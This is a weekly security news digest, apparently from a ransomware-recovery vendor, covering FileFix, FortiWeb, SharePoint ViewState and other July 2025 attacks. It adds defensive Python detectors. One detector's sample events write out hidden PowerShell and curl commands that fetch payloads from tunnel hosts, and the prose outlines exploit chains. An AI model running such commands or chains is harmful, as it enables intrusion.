News Week: July 14th to July 20th, 2025

July 21, 2025

Interlock Ransomware Leverages FileFix and RDP in New Attack Wave

Interlock ransomware has adopted a stealthier delivery technique known as FileFix to plant remote access trojans (RATs) on victims' systems. Where its earlier ClickFix lures had users paste a command into the Run dialog, FileFix abuses the File Explorer address bar: the victim is told to paste what looks like a file path, but the clipboard contents are a disguised PowerShell command that Explorer executes, downloading a payload staged on trycloudflare.com tunnel URLs. Once installed, the PHP-based Interlock RAT gathers system and network details with PowerShell and exfiltrates them as JSON. Responders also observed post-infection Active Directory enumeration and lateral movement over Remote Desktop Protocol (RDP). The change from ClickFix to FileFix matters for defenders because the command never passes through a terminal or the Run dialog, so detections keyed on those launch paths miss it; the parent process to watch is explorer.exe. Proofpoint and The DFIR Report have tracked this activity since May 2025 and describe a campaign that keeps growing in sophistication and reach.
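A detection heuristic for the launch path described above, written for this digest as an added example (it is not Proofpoint's or The DFIR Report's tooling). It runs over constructed process-creation events in a Sysmon/EDR-like shape and flags a shell spawned by explorer.exe whose command line ends in a fake path after a `#` comment (the lure from public FileFix research, assumed here), carries download or window-hiding flags, or references the trycloudflare.com staging host named in the reporting. Field names and the sample events are assumptions.

```python
"""Heuristic detection for FileFix-style launches: a shell spawned by explorer.exe
whose command line hides a command behind a fake file path or pulls a payload
from a tunnel host. Added example; the events are constructed, not real telemetry."""
import re

# Constructed process-creation events in a Sysmon/EDR-like shape (not real logs).
EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe -w hidden -c "irm https://words-words.trycloudflare.com/x | iex" # C:\company\Internal\Secure\policy.pdf'},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -NoProfile -File C:\scripts\backup.ps1"},  # benign
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe -c "Get-Service"'},  # not launched from explorer
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c curl -s https://abc.trycloudflare.com/a.php -o %TEMP%\a.php"},
]

SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
# Download/evasion flags a pasted one-liner typically carries.
DOWNLOAD_OR_HIDE = re.compile(
    r"-w(?:indowstyle)?\s+hidden|-e(?:nc|ncodedcommand)?\s|\biex\b|downloadstring|\birm\b|\bcurl\b",
    re.I)
# FileFix lure (public FileFix research; assumption here): the pasted string ends in a
# '#' comment followed by a plausible path, so Explorer's address bar shows a path
# while PowerShell ignores everything after '#'.
FAKE_PATH_TAIL = re.compile(r"#\s*[A-Za-z]:\\[^\"']+\.\w{2,5}\s*$")
TUNNEL_HOST = re.compile(r"trycloudflare\.com", re.I)  # staging host named in the reporting

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def score_event(ev):
    """Return the reasons an event looks like a FileFix launch (empty = not suspicious)."""
    if basename(ev["parent"]) != "explorer.exe" or basename(ev["image"]) not in SHELLS:
        return []
    cmd = ev["cmdline"]
    reasons = []
    if FAKE_PATH_TAIL.search(cmd):
        reasons.append("fake-path-tail")
    if DOWNLOAD_OR_HIDE.search(cmd):
        reasons.append("download-or-hide-flags")
    if TUNNEL_HOST.search(cmd):
        reasons.append("tunnel-host")
    return reasons

def detect(events):
    """Indexes and reasons for every suspicious event, in input order."""
    hits = []
    for i, ev in enumerate(events):
        reasons = score_event(ev)
        if reasons:
            hits.append((i, reasons))
    return hits

if __name__ == "__main__":
    for i, reasons in detect(EVENTS):
        print(i, EVENTS[i]["cmdline"][:60], reasons)
```

The explorer.exe parent is the discriminating condition: a legitimate script launched from Explorer (event 1) stays quiet, while the pasted lure (event 0) trips all three rules. In production, pair the rule with an allowlist of signed scripts users genuinely launch from Explorer.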

Europol Disrupts NoName057(16) DDoS Group in Coordinated Crackdown

In an operation dubbed "Operation Eastwood," Europol, Eurojust and law enforcement agencies from 13 countries disrupted the pro-Russian hacktivist group NoName057(16), responsible for widespread DDoS attacks across Europe, Ukraine and Israel. Since emerging in 2022, the group has used its "DDoSia" platform to crowdsource attacks through Telegram, paying volunteers who run its client, and has targeted government institutions, energy providers, banks and defense contractors. The action days in mid-July 2025 resulted in the takedown of more than 100 servers and arrests in France and Spain. Key members remain in Russia, however, and Europol warns that the group may quickly rebuild its attack infrastructure. Germany alone recorded 14 waves of attacks affecting over 230 organizations, including arms manufacturers and public services. NoName057(16) continued to announce new DDoS campaigns after the operation, a reminder that taking down a volunteer-driven botnet degrades its capacity without removing the threat.

Remote Code Execution via SQL Injection Hits FortiWeb Devices

Fortinet FortiWeb appliances are being actively exploited through a critical pre-authentication SQL injection vulnerability, CVE-2025-25257, that leads to remote code execution (RCE) on unpatched systems. The flaw affects FortiWeb 7.6.0 through 7.6.3, 7.4.0 through 7.4.7, 7.2.0 through 7.2.10 and 7.0.0 through 7.0.10; the fixed releases are 7.6.4, 7.4.8, 7.2.11 and 7.0.11. An unauthenticated attacker sends crafted HTTP requests whose Authorization: Bearer header value is concatenated into a SQL query. After public proof-of-concept exploits appeared on July 11, Shadowserver saw compromises climb quickly, with 85 FortiWeb devices compromised in a single day. The exploit chain uses the injection's file-write capability to drop a .pth file into the appliance's Python site-packages directory, then requests a legitimate FortiWeb Python CGI script; when that interpreter starts, Python's site module executes the import line in the .pth file, giving full RCE. Fortinet urged users to upgrade immediately, but more than 200 management interfaces remain reachable from the internet, most of them in the U.S. Organizations that cannot update yet should disable the HTTP/HTTPS administrative interface, which removes the vulnerable endpoint. The surge shows how quickly a SQL injection becomes RCE once the database can write files into a path the application later loads.
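Why a dropped `.pth` file is a code-execution primitive, and a scan a responder can run against a site-packages directory before anything loads. This is an added example, not Fortinet's code or the exploit: the site directory, both `.pth` files and the stand-in "payload" (which only writes a marker file) are constructed in a temporary directory. The behaviour it relies on is documented CPython behaviour: `site.addsitedir()` exec's any `.pth` line that begins with `import`.

```python
"""Why a dropped .pth file is a code-execution primitive, and a scan for suspicious
ones. Added example, not Fortinet's code: the site directory and the .pth files
are constructed in a temporary directory, and the 'payload' only writes a marker."""
import os
import re
import site
import tempfile

# CPython's site module processes every *.pth file in a site directory; a line that
# starts with "import " is exec'd rather than treated as a path entry.
EXEC_LINE = re.compile(r"^import[ \t]")
# A bare "import foo" is normal (setuptools, editable installs). Anything that does
# more on the same line is what a dropped payload looks like.
SUSPICIOUS = re.compile(r"^import[ \t].*?(;|\(|\bexec\b|\bos\b|subprocess|base64)")

def write_pth(site_dir, name, lines):
    path = os.path.join(site_dir, name)
    with open(path, "w") as f:
        f.write("\n".join(lines) + "\n")
    return path

def scan_pth(site_dir):
    """Map .pth filename -> offending lines, for every .pth that executes code."""
    findings = {}
    for name in sorted(os.listdir(site_dir)):
        if not name.endswith(".pth"):
            continue
        with open(os.path.join(site_dir, name)) as f:
            bad = [line.rstrip("\n") for line in f
                   if EXEC_LINE.match(line) and SUSPICIOUS.match(line)]
        if bad:
            findings[name] = bad
    return findings

def demo():
    """Scan a constructed site dir, then show the payload runs when the dir is processed."""
    site_dir = tempfile.mkdtemp(prefix="pth-demo-")
    marker = os.path.join(site_dir, "ran.txt")
    write_pth(site_dir, "normal.pth", ["/opt/some/extra/path"])
    write_pth(site_dir, "zzz_payload.pth",
              [f"import os; open({marker!r}, 'w').write('executed')"])  # stand-in payload
    findings = scan_pth(site_dir)        # offline check: nothing has been loaded yet
    site.addsitedir(site_dir)            # what interpreter start-up does for a site dir
    executed = os.path.exists(marker)    # True: the import line ran
    return findings, executed

if __name__ == "__main__":
    findings, executed = demo()
    print("suspicious .pth files:", findings)
    print("payload executed on addsitedir:", executed)
```

Run `scan_pth` against the real site-packages directories of an appliance's Python install (and any directory on `sys.path`) from a mounted image; a `.pth` that does anything beyond a bare `import` or a path entry is worth a close look regardless of its name.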

OVERSTEP Rootkit Gives Attackers Persistent Access to SonicWall SMA 100 Appliances

A newly discovered user-mode rootkit dubbed OVERSTEP has been deployed against SonicWall SMA 100 series appliances, giving the intruders deep persistence and stealth on devices that are already end of life. Google's Threat Intelligence Group (GTIG) attributes the activity to UNC6148, which authenticated with stolen administrator credentials and then obtained a reverse shell on an appliance whose design does not expose one, most likely by exploiting CVE-2024-38475 or a still-undisclosed zero-day. With shell access secured, the actor installed OVERSTEP, which modifies the appliance's boot process to survive reboots and is loaded into every dynamically linked process that starts; on a Linux-based appliance that is the dynamic loader's preload list (/etc/ld.so.preload), which is also the first artifact to check on a disk image. From inside every process it can hide its own files, selectively remove log entries and harvest credentials. Overlaps with earlier Abyss ransomware intrusions suggest a dual-purpose campaign of espionage and extortion; several past Abyss cases followed the same pattern of SMA device access, web shells and firmware-level persistence. GTIG warns that OVERSTEP can extract sensitive material such as OTP seeds and certificates, so credentials and certificates from an affected device should be rotated, not just the admin password. Organizations still running end-of-life SMA appliances are urged to acquire disk images and analyze them offline, because a rootkit loaded into every process can falsify what the live system reports.
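A triage check for the offline analysis the paragraph recommends, added here as an example (it is not GTIG tooling and knows nothing OVERSTEP-specific): given the root of a mounted image, it reports every entry in the loader's preload list and flags entries that sit outside the system library directories, live in a dot-directory, or point at a file that no longer exists. The image tree is constructed in a temporary directory; the library paths in it are made up.

```python
"""Offline triage for a mounted appliance image: report the loader preload list
(/etc/ld.so.preload) and flag entries that look injected. Added example, not GTIG
tooling; the image tree below is constructed in a temp directory."""
import os
import tempfile

# Libraries legitimately preloaded live in the system library dirs; a preload entry
# under /tmp, /var, /dev/shm or a dot-directory is the finding worth chasing.
SYSTEM_LIB_DIRS = ("/lib/", "/lib64/", "/usr/lib/", "/usr/lib64/")

def check_preload(mount_root):
    """Return (entries, findings); findings are (rule, detail) tuples. Run this on an
    offline image: on the live box a preloaded rootkit can hide the file itself."""
    preload = os.path.join(mount_root, "etc", "ld.so.preload")
    if not os.path.isfile(preload):
        return [], []            # absent is the normal state on most systems
    entries, findings = [], [("preload-file-present", "/etc/ld.so.preload")]
    with open(preload) as f:
        for raw in f:
            lib = raw.strip()
            if not lib or lib.startswith("#"):
                continue
            entries.append(lib)
            if not lib.startswith(SYSTEM_LIB_DIRS):
                findings.append(("preload-outside-system-libdirs", lib))
            if "/." in lib:
                findings.append(("preload-in-dot-directory", lib))
            if not os.path.exists(os.path.join(mount_root, lib.lstrip("/"))):
                findings.append(("preload-target-missing", lib))
    return entries, findings

def build_constructed_image():
    """A fake mounted image with an injected preload entry (constructed data)."""
    root = tempfile.mkdtemp(prefix="img-")
    for d in ("etc", "usr/lib", "tmp/.cache"):
        os.makedirs(os.path.join(root, d))
    with open(os.path.join(root, "tmp/.cache/libx.so"), "wb") as f:
        f.write(b"\x7fELF")   # not a real library, just a present file
    with open(os.path.join(root, "etc/ld.so.preload"), "w") as f:
        f.write("# constructed\n/tmp/.cache/libx.so\n/usr/lib/libgone.so\n")
    return root

if __name__ == "__main__":
    entries, findings = check_preload(build_constructed_image())
    print("preload entries:", entries)
    for rule, detail in findings:
        print(f"  {rule}: {detail}")
```

Point `check_preload` at the mount point of the image, not at `/` on a running appliance. Any preload entry at all deserves explanation on an appliance, and an entry whose target is missing on the image usually means the file was removed after the image was taken or was never meant to be found.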

DragonForce Ransomware Breach Exposes 6.5 Million Co-op Member Records

UK retail giant Co-op has confirmed that personal data belonging to all 6.5 million of its members was stolen in the April 2025 cyberattack involving the DragonForce ransomware group. The breach, now linked to Scattered Spider, an intrusion crew previously associated with BlackCat/ALPHV affiliates, was far more severe than initially reported. The attackers gained entry through social engineering, obtaining a password reset for an employee account, and then moved laterally through Co-op's network. Among the files exfiltrated was NTDS.dit, the Active Directory database that holds the password hashes of every domain account; once that file is gone, every domain credential, including service accounts and the krbtgt account, has to be treated as compromised and reset. Co-op CEO Shirine Khoury-Haq publicly apologized, emphasizing the emotional toll on staff and members. No financial data was compromised, but members' contact information was accessed. Law enforcement has since arrested four individuals suspected of involvement in this and other high-profile attacks, including those on M&S and Harrods; the same group was previously linked to the 2023 MGM Resorts breach. Co-op's case underscores the evolving threat posed by the DragonForce, Scattered Spider and BlackCat ecosystem.

Phobos & 8Base Decryptor Recovers Files with Extensions Like .LIZARD, .faust, .phobos

Victims of the Phobos and 8Base ransomware families can now recover encrypted data for free, thanks to a decryptor released by the Japanese police and distributed through Europol's NoMoreRansom platform. It is a breakthrough against the long-running Phobos ransomware-as-a-service operation, whose affiliates combined encryption with data theft for double extortion. The decryptor handles the extensions most often seen in Phobos and 8Base incidents, including .phobos, .8base, .elbie, .faust and .LIZARD, and may work on further variants that are not explicitly listed. Users point the tool at the affected folders and it recursively decrypts files in place, preserving the original directory structure. Before running it, confirm the family from the ransom note and the filename pattern, and work on copies or a forensic image rather than the only surviving encrypted set: a decryptor applied to the wrong family or to a truncated file does not recover it and can complicate a later attempt. The tool is a lifeline for organizations hit by Phobos or its 8Base offshoot.
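The inventory step that belongs before running any decryptor, written for this digest as an added example (it is not the police tool). It parses the victim ID, contact address and extension out of Phobos/8Base-style filenames and summarizes what is on a share: which extensions appear, how many distinct victim IDs and contact addresses are present (more than one means more than one campaign touched the data), and which files did not match the pattern at all. The naming pattern is the one typically seen in these families and is an assumption to verify against your own samples; the file listing is constructed.

```python
"""Inventory of Phobos/8Base-style encrypted files before running the decryptor:
parse the victim ID, contact address and extension out of each filename and
summarize what is on the share. Added example; the file list is constructed."""
import re
from collections import Counter
from pathlib import PurePosixPath

# Typical Phobos/8Base naming (assumption; check it against your own samples):
#   <original name>.id[<8 hex victim id>-<4 digit tag>].[<contact address>].<extension>
PATTERN = re.compile(
    r"^(?P<original>.+?)\.id\[(?P<victim_id>[0-9A-Fa-f]{8})-(?P<tag>\d{4})\]"
    r"\.\[(?P<contact>[^\]]+)\]\.(?P<ext>[A-Za-z0-9]+)$")
# Extensions the digest lists as supported by the decryptor.
LISTED_EXTS = {"phobos", "8base", "elbie", "faust", "lizard"}

# Constructed sample listing, not real victim data.
SAMPLE_PATHS = [
    "/share/finance/q2.xlsx.id[1A2B3C4D-2742].[restore@example.test].faust",
    "/share/finance/q3.xlsx.id[1A2B3C4D-2742].[restore@example.test].faust",
    "/share/hr/handbook.docx.id[1A2B3C4D-2742].[restore@example.test].LIZARD",
    "/share/legacy/backup.zip.id[DEADBEEF-3302].[other@example.test].phobos",
    "/share/hr/notes.txt.id[1A2B3C4D-2742].[restore@example.test].newext",
    "/share/hr/README.txt",
    "/share/info.hta",
]

def parse_name(name):
    """Fields from one encrypted filename, or None if it does not follow the pattern."""
    m = PATTERN.match(name)
    if not m:
        return None
    d = m.groupdict()
    d["ext"] = d["ext"].lower()            # extension case varies (.LIZARD, .faust)
    d["listed"] = d["ext"] in LISTED_EXTS
    return d

def inventory(paths):
    """Counts per extension, distinct victim IDs and contacts, files with an extension
    the decryptor does not list, and files the pattern did not match (ransom notes,
    untouched files, or a variant that needs a closer look)."""
    out = {"by_ext": Counter(), "victim_ids": set(), "contacts": set(),
           "unlisted_ext": [], "unmatched": []}
    for p in paths:
        d = parse_name(PurePosixPath(p).name)
        if d is None:
            out["unmatched"].append(p)
            continue
        out["by_ext"][d["ext"]] += 1
        out["victim_ids"].add(d["victim_id"])
        out["contacts"].add(d["contact"])
        if not d["listed"]:
            out["unlisted_ext"].append(p)
    return out

if __name__ == "__main__":
    summary = inventory(SAMPLE_PATHS)
    for key, value in summary.items():
        print(f"{key}: {value}")
```

Feed it the output of a recursive listing of the affected shares. The `unlisted_ext` and `unmatched` buckets are the ones to resolve by hand before the decryptor runs: the first may still be recoverable (the tool may support variants it does not list), the second is where ransom notes and a second, unrelated family tend to show up.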

CrushFTP Zero-Day Exploit Allows Server Takeover via Web Interface

A newly discovered zero-day, CVE-2025-54309, is being actively exploited to take over unpatched CrushFTP servers. It affects builds earlier than CrushFTP 10.8.5 and 11.3.4_23 and lets unauthenticated attackers obtain administrative access through the HTTP(S) web interface. CrushFTP believes the attackers reverse-engineered its software, found the bug in older builds, and went after servers that had not kept up with updates; an earlier, unrelated fix (to AS2 validation over HTTP(S)) had incidentally closed the hole, which is why only current builds are protected. The exploit alters the default user configuration, giving the attacker a hidden administrative login. Indicators include logins that do not match normal activity and tampered user.XML files, in particular a default user that has acquired admin rights. CrushFTP recommends a DMZ deployment, but Rapid7 cautions that such a configuration may not fully mitigate zero-day exploitation. The incident adds CrushFTP to the growing list of managed file transfer products hit with zero-days for data theft and follow-on malware, echoing earlier Clop ransomware campaigns against the same product category.

Microsoft SharePoint Zero-Day Enables Remote Code Execution in Ongoing Attacks

Two critical zero-day vulnerabilities in Microsoft SharePoint Server, CVE-2025-53770 and CVE-2025-53771, are being exploited in remote code execution (RCE) attacks against on-premises servers worldwide. They bypass Microsoft's July fixes for the original ToolShell chain (CVE-2025-49706 plus CVE-2025-49704). Attackers upload a malicious .aspx file such as spinstall0.aspx that dumps the server's ASP.NET machine keys (the ValidationKey and DecryptionKey); with those keys they can sign arbitrary __VIEWSTATE payloads, and a serialized gadget chain carrying a valid MAC is deserialized as trusted page state, which yields code execution. Microsoft has released emergency updates for SharePoint Subscription Edition, 2019 and 2016, but dozens of organizations, including government agencies and private companies, were compromised before the fixes landed. Microsoft's guidance is to apply the updates, enable AMSI integration with an antivirus engine, rotate the machine keys and restart IIS, and keep unpatched servers off the internet until they are fixed. The key rotation is not optional: the patch closes the upload path, but an attacker who already holds the old ValidationKey can keep forging valid ViewState until the keys change, which is what makes this one of the most dangerous RCE zero-days currently in the wild.
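A worked model of the trust property at stake, added here as an example (it is not Microsoft's or SharePoint's code): ViewState is accepted when its MAC verifies under the server's validation key, so without the key a forged token is rejected, with a stolen key it is accepted as trusted state, and rotating the key invalidates the forgery. The model is deliberately simplified; real ASP.NET uses its own serializer, key derivation and MAC layout, and the stand-in for "deserialize trusted state" is a JSON field, not an object graph.

```python
"""Why a leaked ValidationKey turns __VIEWSTATE into a code-execution primitive, and
why key rotation (not just the patch) is required. Simplified model added here:
real ASP.NET uses its own serializer, key derivation and MAC layout, not this one."""
import base64
import hashlib
import hmac
import json
import os

MAC_LEN = 32

def sign(validation_key, payload):
    """token = base64(payload || HMAC-SHA256(validation_key, payload))"""
    mac = hmac.new(validation_key, payload, hashlib.sha256).digest()
    return base64.b64encode(payload + mac).decode()

def verify(validation_key, token):
    """Return the payload if the MAC checks out under validation_key, else None."""
    blob = base64.b64decode(token)
    payload, mac = blob[:-MAC_LEN], blob[-MAC_LEN:]
    expected = hmac.new(validation_key, payload, hashlib.sha256).digest()
    return payload if hmac.compare_digest(mac, expected) else None

class Server:
    """Minimal stand-in for an ASP.NET page that round-trips ViewState."""
    def __init__(self):
        self.rotate()

    def rotate(self):
        self.validation_key = os.urandom(64)   # machineKey validationKey

    def issue(self, state):
        return sign(self.validation_key, json.dumps(state).encode())

    def accept(self, token):
        payload = verify(self.validation_key, token)
        if payload is None:
            return "rejected: bad MAC"
        # Past this point the server treats the content as trusted. In real ASP.NET the
        # payload is a serialized object graph, so a valid MAC over an attacker-chosen
        # gadget chain is exactly the deserialization-to-RCE step the reporting describes.
        return "trusted: " + json.loads(payload)["state"]

def scenario():
    srv = Server()
    legit = srv.accept(srv.issue({"state": "page-data"}))
    attacker_state = json.dumps({"state": "attacker-chosen"}).encode()
    r_guess = srv.accept(sign(os.urandom(64), attacker_state))   # no key: rejected
    stolen = srv.validation_key                 # what a key-dumping web shell yields
    forged = sign(stolen, attacker_state)
    r_forged = srv.accept(forged)               # stolen key: trusted
    srv.rotate()                                # rotate machineKey (then restart IIS)
    r_after = srv.accept(forged)                # same token now fails
    return legit, r_guess, r_forged, r_after

if __name__ == "__main__":
    for label, result in zip(("legit", "guessed key", "stolen key", "after rotation"), scenario()):
        print(f"{label:15} -> {result}")
```

The third and fourth results are the point: a server that has been patched but still uses the dumped key returns "trusted" for the forged token, and only the rotation flips it back to "rejected". On a SharePoint farm the keys are shared across servers, so rotate them farm-wide and restart IIS everywhere.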

Conclusion

The recent zero-day vulnerabilities in Microsoft SharePoint highlight how even well-established enterprise platforms can become critical entry points for remote code execution attacks. As threat actors continue to exploit these flaws to gain unauthorized access and execute malicious code, organizations must act swiftly to patch systems and implement layered defenses.

As experts in ransomware recovery and cybersecurity, we offer specialized services such as Ransomware Recovery Services and Ransomware Negotiation Services. Our Cyber Defense Academy provides education to build resilience, while our Cybersecurity Risk Assessment and Incident Response Retainer help organizations proactively prepare for and respond to threats.

Reach out today to learn how our ransomware decryption service and cybersecurity solutions can help safeguard your operations.